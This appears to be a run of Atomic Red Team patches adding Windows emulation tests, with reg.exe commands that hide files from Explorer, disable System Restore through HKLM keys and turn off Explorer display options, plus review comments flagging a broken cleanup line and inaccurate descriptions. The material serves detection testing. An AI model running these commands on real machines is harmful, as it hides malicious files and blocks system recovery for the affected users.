From: CircleCI Atomic Red Team doc generator Date: Thu, 17 Mar 2022 16:23:47 +0000 Subject: [PATCH 65/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 17 +++++++++ atomics/T1564.001/T1564.001.md | 37 +++++++++++++++++++ 6 files changed, 58 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 31890b17..99d0d5ee 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -425,6 +425,7 @@ defense-evasion,T1564.001,Hidden Files and Directories,4,Create Windows Hidden F defense-evasion,T1564.001,Hidden Files and Directories,5,Hidden files,3b7015f2-3144-4205-b799-b05580621379,sh defense-evasion,T1564.001,Hidden Files and Directories,6,Hide a Directory,b115ecaf-3b24-4ed2-aefe-2fcb9db913d3,sh defense-evasion,T1564.001,Hidden Files and Directories,7,Show all hidden files,9a1ec7da-b892-449f-ad68-67066d04380c,sh +defense-evasion,T1564.001,Hidden Files and Directories,8,Hide Files Through Registry,f650456b-bd49-4bc1-ae9d-271b5b9581e7,command_prompt defense-evasion,T1564.002,Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh defense-evasion,T1564.002,Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 3c78d0fd..37e47e0f 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -274,6 +274,7 @@ defense-evasion,T1070.004,File Deletion,9,Delete Prefetch File,36f96049-0ad7-4a5 defense-evasion,T1070.004,File Deletion,10,Delete TeamViewer Log Files,69f50a5f-967c-4327-a5bb-e1a9a9983785,powershell defense-evasion,T1564.001,Hidden Files and Directories,3,Create Windows System File with Attrib,f70974c8-c094-4574-b542-2c545af95a32,command_prompt defense-evasion,T1564.001,Hidden Files and Directories,4,Create Windows Hidden File with Attrib,dadb792e-4358-4d8d-9207-b771faa0daa5,command_prompt +defense-evasion,T1564.001,Hidden Files and Directories,8,Hide Files Through Registry,f650456b-bd49-4bc1-ae9d-271b5b9581e7,command_prompt defense-evasion,T1564.003,Hidden Window,1,Hidden Window,f151ee37-9e2b-47e6-80e4-550b9f999b7a,powershell defense-evasion,T1564,Hide Artifacts,1,Extract binary files via VBA,6afe288a-8a8b-4d33-a629-8d03ba9dad3a,powershell defense-evasion,T1564,Hide Artifacts,2,"Create a Hidden User Called ""$""",2ec63cc2-4975-41a6-bf09-dffdfb610778,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 9666ef5b..3e7a10c4 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -675,6 +675,7 @@ - Atomic Test #5: Hidden files [macos] - Atomic Test #6: Hide a Directory [macos] - Atomic Test #7: Show all hidden files [macos] + - Atomic Test #8: Hide Files Through Registry [windows] - [T1564.002 Hidden Users](../../T1564.002/T1564.002.md) - Atomic Test #1: Create Hidden User using UniqueID < 500 [macos] - Atomic Test #2: Create Hidden User using IsHidden option [macos] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 777a40d0..861cab4c 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md 
@@ -465,6 +465,7 @@ - [T1564.001 Hidden Files and Directories](../../T1564.001/T1564.001.md) - Atomic Test #3: Create Windows System File with Attrib [windows] - Atomic Test #4: Create Windows Hidden File with Attrib [windows] + - Atomic Test #8: Hide Files Through Registry [windows] - [T1564.003 Hidden Window](../../T1564.003/T1564.003.md) - Atomic Test #1: Hidden Window [windows] - [T1564 Hide Artifacts](../../T1564/T1564.md) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 91e8fe9c..0f3f7d34 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -28573,6 +28573,23 @@ defense-evasion: ' name: sh + - name: Hide Files Through Registry + auto_generated_guid: f650456b-bd49-4bc1-ae9d-271b5b9581e7 + description: "Disable Show Hidden files switch in registry. This technique was + abused by several malware to hide their files from normal user.\nSee how this + trojan abuses this technique - https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/W32~Tiotua-P/detailed-analysis.aspx + \n" + supported_platforms: + - windows + executor: + command: | + reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f + reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f + cleanup_command: | + reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /f >nul 2>&1 + reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /f >nul 2>&1 + name: command_prompt + elevation_required: true T1564.002: technique: external_references: diff --git a/atomics/T1564.001/T1564.001.md b/atomics/T1564.001/T1564.001.md index 2770bf94..1d3175b6 100644 --- a/atomics/T1564.001/T1564.001.md +++ b/atomics/T1564.001/T1564.001.md 
@@ -24,6 +24,8 @@ Adversaries can use this to their advantage to hide files and folders anywhere o - [Atomic Test #7 - Show all hidden files](#atomic-test-7---show-all-hidden-files) +- [Atomic Test #8 - Hide Files Through Registry](#atomic-test-8---hide-files-through-registry) +
@@ -283,4 +285,39 @@ defaults write com.apple.finder AppleShowAllFiles NO +
+
+ +## Atomic Test #8 - Hide Files Through Registry +Disable Show Hidden files switch in registry. This technique was abused by several malware to hide their files from normal user. +See how this trojan abuses this technique - https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/W32~Tiotua-P/detailed-analysis.aspx + +**Supported Platforms:** Windows + + +**auto_generated_guid:** f650456b-bd49-4bc1-ae9d-271b5b9581e7 + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 0 /f +reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 0 /f +``` + +#### Cleanup Commands: +```cmd +reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /f >nul 2>&1 +reg delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /f >nul 2>&1 +``` + + + + +
From b8066ba1816e507372ce755bb7c177ec998886d4 Mon Sep 17 00:00:00 2001 From: tccontre <26181693+tccontre@users.noreply.github.com> Date: Thu, 17 Mar 2022 17:24:40 +0100 Subject: [PATCH 66/83] Disable system restore through registry (#1818) * Update T1112.yaml * Update T1112.yaml * typos * Update T1490.yaml Co-authored-by: Carrie Roberts --- atomics/T1490/T1490.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/atomics/T1490/T1490.yaml b/atomics/T1490/T1490.yaml index f117a4da..c499ec54 100644 --- a/atomics/T1490/T1490.yaml +++ b/atomics/T1490/T1490.yaml 
@@ -115,3 +115,23 @@ atomic_tests: schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable >nul 2>&1 name: command_prompt elevation_required: true +- name: Disable System Restore Through Registry + auto_generated_guid: 66e647d1-8741-4e43-b7c1-334760c2047f + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to disable system restore on the computer. + See how remcos RAT abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details + supported_platforms: + - windows + executor: + command: | + reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f + reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f + reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f + reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f + cleanup_command: | + reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /f >nul 2>&1 + reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /f >nul 2>&1 + reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /f >nul 2>&1 + reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /f >nul 2>&1 + name: command_prompt + elevation_required: true From 6c5ba92a6b167f4b84f495c712ed1462daad941f Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Thu, 17 Mar 2022 16:25:24 +0000 Subject: [PATCH 67/83] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) 
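Review bot: The description says the test modifies "the registry of the currently logged in user", but all four `reg add` lines write under `HKLM` (`SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore` and `SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore`), which are machine-wide keys — consistent with `elevation_required: true` but not with the text. Suggest `Modify the machine-wide registry (HKLM) using reg.exe via cmd console to disable System Restore on the computer.` The cleanup also deletes the four values outright, so on a host where an administrator had already set `DisableConfig` or `DisableSR`, that prior configuration is removed rather than restored; stating this in the description lets operators export the two keys before running the test. The preceding test's executor block that the context lines belong to starts outside the hunk.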
diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 834a6cd3..5583c396 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -930,3 +930,4 @@ a4637291-40b1-4a96-8c82-b28f1d73e54e 9dc7767b-30c1-4cc4-b999-50cab5e27891 94ea9cc3-81f9-4111-8dde-3fb54f36af4b f650456b-bd49-4bc1-ae9d-271b5b9581e7 +66e647d1-8741-4e43-b7c1-334760c2047f From f6bb04b95fd3d955fdb8468f1934c9bfaa6d05e4 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 17 Mar 2022 16:25:32 +0000 Subject: [PATCH 68/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 20 +++++++++ atomics/T1490/T1490.md | 41 +++++++++++++++++++ 6 files changed, 65 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 99d0d5ee..c1a95375 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -780,6 +780,7 @@ impact,T1490,Inhibit System Recovery,5,Windows - Delete Volume Shadow Copies via impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc8a-4ea6-891f-6058569653bf,command_prompt impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt +impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt impact,T1491.001,Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 37e47e0f..c9e747c8 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -533,6 +533,7 @@ impact,T1490,Inhibit System Recovery,5,Windows - Delete Volume Shadow Copies via impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc8a-4ea6-891f-6058569653bf,command_prompt impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt +impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt impact,T1491.001,Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 3e7a10c4..6c942ee5 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1258,6 +1258,7 @@ - Atomic Test #6: Windows - Delete Backup Files [windows] - Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows] - Atomic Test #8: Windows - Disable the SR scheduled task [windows] + - Atomic Test #9: Disable System Restore Through Registry [windows] - [T1491.001 Internal Defacement](../../T1491.001/T1491.001.md) - Atomic Test #1: Replace Desktop Wallpaper [windows] - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 861cab4c..0c3b24f4 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md 
@@ -898,6 +898,7 @@ - Atomic Test #6: Windows - Delete Backup Files [windows] - Atomic Test #7: Windows - wbadmin Delete systemstatebackup [windows] - Atomic Test #8: Windows - Disable the SR scheduled task [windows] + - Atomic Test #9: Disable System Restore Through Registry [windows] - [T1491.001 Internal Defacement](../../T1491.001/T1491.001.md) - Atomic Test #1: Replace Desktop Wallpaper [windows] - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 0f3f7d34..f2c596cc 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -53804,6 +53804,26 @@ impact: ' name: command_prompt elevation_required: true + - name: Disable System Restore Through Registry + auto_generated_guid: 66e647d1-8741-4e43-b7c1-334760c2047f + description: "Modify the registry of the currently logged in user using reg.exe + via cmd console to disable system restore on the computer. \nSee how remcos + RAT abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details\n" + supported_platforms: + - windows + executor: + command: | + reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f + reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f + reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f + reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f + cleanup_command: | + reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /f >nul 2>&1 + reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /f >nul 2>&1 + reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /f >nul 2>&1 + reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /f >nul 2>&1 + name: command_prompt + elevation_required: true T1491.001: technique: external_references: diff --git a/atomics/T1490/T1490.md b/atomics/T1490/T1490.md index 6004eceb..c9a35760 100644 --- a/atomics/T1490/T1490.md +++ b/atomics/T1490/T1490.md 
@@ -27,6 +27,8 @@ A number of native Windows utilities have been used by adversaries to disable or - [Atomic Test #8 - Windows - Disable the SR scheduled task](#atomic-test-8---windows---disable-the-sr-scheduled-task) +- [Atomic Test #9 - Disable System Restore Through Registry](#atomic-test-9---disable-system-restore-through-registry) +
@@ -285,4 +287,43 @@ schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /enable >nul 2>&1 +
+
+ +## Atomic Test #9 - Disable System Restore Through Registry +Modify the registry of the currently logged in user using reg.exe via cmd console to disable system restore on the computer. +See how remcos RAT abuses this technique- https://www.virustotal.com/gui/file/2d7855bf6470aa323edf2949b54ce2a04d9e38770f1322c3d0420c2303178d91/details + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 66e647d1-8741-4e43-b7c1-334760c2047f + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f +reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /t "REG_DWORD" /d "1" /f +reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /t "REG_DWORD" /d "1" /f +``` + +#### Cleanup Commands: +```cmd +reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /f >nul 2>&1 +reg delete "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /f >nul 2>&1 +reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableConfig" /f >nul 2>&1 +reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v "DisableSR" /f >nul 2>&1 +``` + + + + +
From da6f4250f35bf68b043e4964081081c0b4524398 Mon Sep 17 00:00:00 2001 From: tccontre <26181693+tccontre@users.noreply.github.com> Date: Thu, 17 Mar 2022 17:26:37 +0100 Subject: [PATCH 69/83] Modify show compress color and tips in registry (#1819) * Update T1112.yaml * Update T1112.yaml * typos * Update T1112.yaml * Update T1112.yaml Co-authored-by: Carrie Roberts --- atomics/T1112/T1112.yaml | 16 ++++++++++++++++ 1 file changed, 16 insertions(+) diff --git a/atomics/T1112/T1112.yaml b/atomics/T1112/T1112.yaml index aed17b49..48cdab44 100644 --- a/atomics/T1112/T1112.yaml +++ b/atomics/T1112/T1112.yaml @@ -480,3 +480,19 @@ atomic_tests: reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v HideSCAVolume /f >nul 2>&1 name: command_prompt elevation_required: true +- name: Windows Modify Show Compress Color And Info Tip Registry + auto_generated_guid: 795d3248-0394-4d4d-8e86-4e8df2a2693f + description: | + Modify the registry of the currently logged in user using reg.exe via cmd console to show compress color and show tips feature. + See how hermeticwiper uses this technique - https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html + supported_platforms: + - windows + executor: + command: | + reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /t REG_DWORD /d 0 /f + reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f + cleanup_command: | + reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1 + reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor/f >nul 2>&1 + name: command_prompt + elevation_required: true From d2c0df108e3551c5342113a5102e704842378470 Mon Sep 17 00:00:00 2001 
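Review bot: The second cleanup line, `reg delete ... /v ShowCompColor/f >nul 2>&1`, is missing the space before `/f`, so reg.exe treats `ShowCompColor/f` as the value name, the real `ShowCompColor` value is never removed, and the `>nul 2>&1` redirect hides the failure; it should read `reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /f >nul 2>&1` (patch 74 later in this series makes that correction). The description also says the commands "show compress color and show tips feature", while both `reg add` lines set the values to `0`, i.e. they turn those Explorer display options off; suggest `... to turn off the compressed-file colouring and info-tip display in Explorer.` Both writes target `HKCU`, so `elevation_required: true` looks unnecessary — confirm against the cited HermeticWiper write-up before dropping it.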
From: CircleCI Atomic Red Team GUID generator Date: Thu, 17 Mar 2022 16:27:11 +0000 Subject: [PATCH 70/83] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 5583c396..e2b027a3 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -931,3 +931,4 @@ a4637291-40b1-4a96-8c82-b28f1d73e54e 94ea9cc3-81f9-4111-8dde-3fb54f36af4b f650456b-bd49-4bc1-ae9d-271b5b9581e7 66e647d1-8741-4e43-b7c1-334760c2047f +795d3248-0394-4d4d-8e86-4e8df2a2693f From 7845416d3d1680a03758fb670b5d9ac9c40c94dc Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Thu, 17 Mar 2022 16:27:17 +0000 Subject: [PATCH 71/83] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 1 + atomics/Indexes/Indexes-CSV/windows-index.csv | 1 + atomics/Indexes/Indexes-Markdown/index.md | 1 + .../Indexes/Indexes-Markdown/windows-index.md | 1 + atomics/Indexes/index.yaml | 16 ++++++++ atomics/T1112/T1112.md | 37 +++++++++++++++++++ 6 files changed, 57 insertions(+) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index c1a95375..8344679a 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv 
@@ -504,6 +504,7 @@ defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group Policy Feat defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt +defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index c9e747c8..4fc63db9 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv 
@@ -334,6 +334,7 @@ defense-evasion,T1112,Modify Registry,27,Windows HideSCAHealth Group Policy Feat defense-evasion,T1112,Modify Registry,28,Windows HideSCANetwork Group Policy Feature,3e757ce7-eca0-411a-9583-1c33b8508d52,command_prompt defense-evasion,T1112,Modify Registry,29,Windows HideSCAPower Group Policy Feature,8d85a5d8-702f-436f-bc78-fcd9119496fc,command_prompt defense-evasion,T1112,Modify Registry,30,Windows HideSCAVolume Group Policy Feature,7f037590-b4c6-4f13-b3cc-e424c5ab8ade,command_prompt +defense-evasion,T1112,Modify Registry,31,Windows Modify Show Compress Color And Info Tip Registry,795d3248-0394-4d4d-8e86-4e8df2a2693f,command_prompt defense-evasion,T1218.005,Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt defense-evasion,T1218.005,Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt defense-evasion,T1218.005,Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 6c942ee5..2d17e41a 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -779,6 +779,7 @@ - Atomic Test #28: Windows HideSCANetwork Group Policy Feature [windows] - Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows] - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows] + - Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows] - T1601 Modify System Image [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - [T1218.005 Mshta](../../T1218.005/T1218.005.md) - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] 
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 0c3b24f4..0defaf92 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -546,6 +546,7 @@ - Atomic Test #28: Windows HideSCANetwork Group Policy Feature [windows] - Atomic Test #29: Windows HideSCAPower Group Policy Feature [windows] - Atomic Test #30: Windows HideSCAVolume Group Policy Feature [windows] + - Atomic Test #31: Windows Modify Show Compress Color And Info Tip Registry [windows] - [T1218.005 Mshta](../../T1218.005/T1218.005.md) - Atomic Test #1: Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject [windows] - Atomic Test #2: Mshta executes VBScript to execute malicious command [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index f2c596cc..5423cc2f 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -32224,6 +32224,22 @@ defense-evasion: ' name: command_prompt elevation_required: true + - name: Windows Modify Show Compress Color And Info Tip Registry + auto_generated_guid: 795d3248-0394-4d4d-8e86-4e8df2a2693f + description: "Modify the registry of the currently logged in user using reg.exe + via cmd console to show compress color and show tips feature. \nSee how hermeticwiper + uses this technique - https://www.splunk.com/en_us/blog/security/detecting-hermeticwiper.html\n" + supported_platforms: + - windows + executor: + command: | + reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /t REG_DWORD /d 0 /f + reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor /t REG_DWORD /d 0 /f + cleanup_command: | + reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowInfoTip /f >nul 2>&1 + reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCompColor/f >nul 2>&1 + name: command_prompt + elevation_required: true T1601: technique: external_references: diff --git a/atomics/T1112/T1112.md b/atomics/T1112/T1112.md index e4526dd0..1b235756 100644 --- a/atomics/T1112/T1112.md +++ b/atomics/T1112/T1112.md @@ -70,6 +70,8 @@ The Registry of a remote system may be modified to aid in execution of files as - [Atomic Test #30 - Windows HideSCAVolume Group Policy Feature](#atomic-test-30---windows-hidescavolume-group-policy-feature) +- [Atomic Test #31 - Windows Modify Show Compress Color And Info Tip Registry](#atomic-test-31---windows-modify-show-compress-color-and-info-tip-registry) +
@@ -1122,4 +1124,39 @@ reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies +
+
